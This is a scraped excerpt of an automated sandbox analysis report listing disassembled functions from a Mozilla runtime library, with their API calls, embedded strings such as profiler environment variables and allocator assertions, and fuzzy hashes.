Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 425d33142a109e775378df59806bfdb8ac517e73c7b0f18b8a35094ecb6d933c
Instruction ID: 2eefa3ad89ecabb186eac71ab4582731ecc33519134fd8751b3a4203aeb5a2a5
Opcode Fuzzy Hash: 425d33142a109e775378df59806bfdb8ac517e73c7b0f18b8a35094ecb6d933c
Instruction Fuzzy Hash: D601E830A04108EBDB05CF98C5967BC7FB5BF04309F288489D9056B351C7755E88DF95

Non-executed Functions

Function 6C665440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C665492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6654A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6654BE
__Init_thread_footer.LIBCMT ref: 6C6654DB

Part of subcall function 6C68AB3F: EnterCriticalSection.KERNEL32(6C6DE370,?,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284), ref: 6C68AB49
Part of subcall function 6C68AB3F: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68AB7C

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C6654F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C665516
GetCurrentThreadId.KERNEL32 ref: 6C66556A
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665577
moz_xmalloc.MOZGLUE(00000070), ref: 6C665585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C665590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6655E6
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C665616

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetCurrentThreadId.KERNEL32 ref: 6C66563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C665646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C66567C
free.MOZGLUE(?), ref: 6C6656AE

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6656E8
GetCurrentThreadId.KERNEL32 ref: 6C665707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C66570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C665729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C66574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C66576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C665796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6657B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6657CA

Strings

MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C665766
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6656E3
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C665BBE
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C665CF9
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C665717
MOZ_BASE_PROFILER_HELP, xrefs: 6C665511
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C665D01
[I %d/%d] profiler_init, xrefs: 6C66564E
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C665724
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6654B9
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6654A3
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C665C56
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C665791
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C665D2B
MOZ_PROFILER_STARTUP, xrefs: 6C6655E1
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C66548D
GeckoMain, xrefs: 6C665554, 6C6655D5
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C665D24
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C66584E
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C665AC9
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C665B38
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6657C5
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6657AE
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C665D1C
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C665749

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction ID: 177a8c64f2d46a8a752f75fa61e52c8de68fafea378d92d8cf6f77fefddd9d63
Opcode Fuzzy Hash: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction Fuzzy Hash: 2D2205709043419FDB009F76C89666ABBB5AF8734CF04462AE94A87F42EB31E445CB5F

Function 6C666C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C666CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C666D26

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C666D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C666D73
free.MOZGLUE(00000000), ref: 6C666D80
CertGetNameStringW.CRYPT32 ref: 6C666DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C666DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C666DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C666E10
CryptMsgClose.CRYPT32(00000000), ref: 6C666E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C666E34
CreateFileW.KERNEL32 ref: 6C666EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C666F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C66709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C667103
free.MOZGLUE(00000000), ref: 6C667153
CloseHandle.KERNEL32(?), ref: 6C667176
__Init_thread_footer.LIBCMT ref: 6C667209
__Init_thread_footer.LIBCMT ref: 6C66723A
__Init_thread_footer.LIBCMT ref: 6C66726B
__Init_thread_footer.LIBCMT ref: 6C66729C
__Init_thread_footer.LIBCMT ref: 6C6672DC
__Init_thread_footer.LIBCMT ref: 6C66730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6673C2
VerSetConditionMask.NTDLL ref: 6C6673F3
VerSetConditionMask.NTDLL ref: 6C6673FF
VerSetConditionMask.NTDLL ref: 6C667406
VerSetConditionMask.NTDLL ref: 6C66740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C66741A
moz_xmalloc.MOZGLUE(?), ref: 6C66755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C667568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C667585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C667598
free.MOZGLUE(00000000), ref: 6C6675AC

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

SHA256, xrefs: 6C666EC0
CryptCATAdminReleaseCatalogContext, xrefs: 6C6672C8
(, xrefs: 6C66768A
wintrust.dll, xrefs: 6C6672CD

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction ID: 66a7cec88e3af785e2294924bd49185265c2d8ef4da158a834f2fe8299d93b89
Opcode Fuzzy Hash: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction Fuzzy Hash: 9852E871A042149FEB21DF26CC84BAA77B8EF46704F144599E909A7A40DB70BF84CF5A

Function 6C690DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C690F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C690F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C690FB7
EnterCriticalSection.KERNEL32(?), ref: 6C690FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C691031
LeaveCriticalSection.KERNEL32(?), ref: 6C6910D0
EnterCriticalSection.KERNEL32(?), ref: 6C69117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C691C39
EnterCriticalSection.KERNEL32(6C6DE744), ref: 6C693391
LeaveCriticalSection.KERNEL32(6C6DE744), ref: 6C6933CD
LeaveCriticalSection.KERNEL32(?), ref: 6C693431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693437

Strings

MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6937D2
: (malloc) Unsupported character in malloc options: ', xrefs: 6C693A02
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C693793
MOZ_CRASH(), xrefs: 6C693950
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6937BD
MALLOC_OPTIONS, xrefs: 6C6935FE
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6937A8
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C693559, 6C69382D, 6C693848
Compile-time page size does not divide the runtime one., xrefs: 6C693946
<jemalloc>, xrefs: 6C693941, 6C6939F1

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction ID: 96dae9f6c816b0358c2a12f1448292288e71a0c622159dc55be4494e21494cd5
Opcode Fuzzy Hash: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction Fuzzy Hash: 1F539E71A057028FD704CF29C580616FBE1BF8A328F29C76DE8699B791D771E842CB85

Function 6C6B34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EE2

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6B61DD
Part of subcall function 6C6B6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6B622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4157

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6B6250
Part of subcall function 6C6B6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6B6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4896
free.MOZGLUE ref: 6C6B489F

Strings

, xrefs: 6C6B4CD2

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction ID: 58ee6da397fa28b9ce1d1355d0b4e0bc2cd33d329d9bb7f3149907bc63987aa2
Opcode Fuzzy Hash: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction Fuzzy Hash: 3CF26C74908B808FC725CF29C08469AFBF1FFCA304F118A5ED99997711DB71A896CB46

Function 6C6664C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6664DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6664F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C666505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C666518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C66671C
GetCurrentProcess.KERNEL32 ref: 6C666724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C66672F
GetCurrentProcess.KERNEL32 ref: 6C666759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C666764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C666A80
GetSystemInfo.KERNEL32(?), ref: 6C666ABE
__Init_thread_footer.LIBCMT ref: 6C666AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AF7

Strings

nvd3d9wrap.dll, xrefs: 6C666500
nvdxgiwrap.dll, xrefs: 6C666513
user32.dll, xrefs: 6C666526
detoured.dll, xrefs: 6C6664DA
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C666798
_etoured.dll, xrefs: 6C6664ED

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction ID: 7cc53657b461bba9e13a34008fa2f976f06660de6afbf4b2ef5565db851e3b8a
Opcode Fuzzy Hash: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction Fuzzy Hash: 5CF1E6709052199FDB20CF26DC887DAB7B5AF46318F144299D809E3B41D731EE85CF9A

Function 6C6BC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6BC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE472

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 07666fdb95abeea65de448be75d2845b17df2f4a7965e0ad538a7b64aa7667bc
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 5733AC71E0021A8FCB04CFA8C8806EDBBF2FF49314F288269D955BB755D731A956CB94

Function 6C67ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C67EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C67EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C681695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6816B4
